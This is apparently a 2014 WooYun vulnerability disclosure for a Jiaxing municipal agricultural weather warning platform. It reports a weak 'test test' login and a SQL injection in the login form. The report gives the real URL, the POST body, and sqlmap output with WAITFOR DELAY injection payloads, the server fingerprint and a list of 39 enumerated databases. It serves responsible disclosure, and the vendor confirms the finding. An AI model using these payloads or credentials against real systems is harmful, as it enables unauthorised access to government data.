当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064135

漏洞标题:嘉兴市某监测预警服务平台弱口令及SQL注入并涉及其他网站

相关厂商:cncert国家互联网应急中心

漏洞作者: 袋鼠妈妈

提交时间:2014-06-09 12:17

修复时间:2014-07-24 12:18

公开时间:2014-07-24 12:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-09: 细节已通知厂商并且等待厂商处理中
2014-06-14: 厂商已经确认,细节仅向厂商公开
2014-06-24: 细节向核心白帽子及相关领域专家公开
2014-07-04: 细节向普通白帽子公开
2014-07-14: 细节向实习白帽子公开
2014-07-24: 细节向公众公开

简要描述:

嘉兴市某监测预警服务平台弱口令及SQL注入

详细说明:

1.嘉兴市农业气象监测预警服务平台用户登录:http://ny.jxqx.net/login.php
2.弱口令:test test

1.GIF


3.登陆处sql注入:

http://ny.jxqx.net/login.php (POST)
user=admin&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95


数据中包括嘉善党建网、嘉兴党建网、嘉兴市农业气象监测预警服务平台等

2.GIF


sqlmap identified the following injection points with a total of 1637 HTTP(s) requests:
---
Place: POST
Parameter: user
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: user=admin'; WAITFOR DELAY '0:0:5'--&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: user=admin' WAITFOR DELAY '0:0:5'--&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95
---
web server operating system: FreeBSD
web application technology: Apache 2.2.27
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: user
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: user=admin'; WAITFOR DELAY '0:0:5'--&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: user=admin' WAITFOR DELAY '0:0:5'--&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95
---
web server operating system: FreeBSD
web application technology: Apache 2.2.27
back-end DBMS: Microsoft SQL Server 2000
available databases [39]:
[*] [AME ]
[*] [A文件]
[*] [公共气象服务]
[*] [喁务一体化]
[*] [嘉兴党建网]
[*] [嘉兴气象台评分\x05\x05]
[*] [嘉善党建网]
[*] [天气流程]
[*] [文明建设网]
[*] [气象灾害]
[*] [生态农气\x03]
[*] [用户]
[*] [自动站]
[*] AWS
[*] AWS352
[*] AWS_TEST
[*] AWS_Wind
[*] AWSReal
[*] AWSTEST
[*] changwang
[*] customAqarm
[*] DBMANAGE
[*] equip
[*] fcstmanage
[*] hyaws
[*] JXSQXTDB
[*] master
[*] model
[*] msdb
[*] NorthwindA
[*] OfficeBusiness_ck
[*] prvprz
[*] pubs
[*] Telescope
[*] tempdb
[*] test
[*] tmp
[*] WeaterDB
[*] zdz

漏洞证明:

修复方案:

版权声明:转载请注明来源 袋鼠妈妈@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-06-14 09:24

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心处置。按多个漏洞点综合评分,rank 12

最新状态:

暂无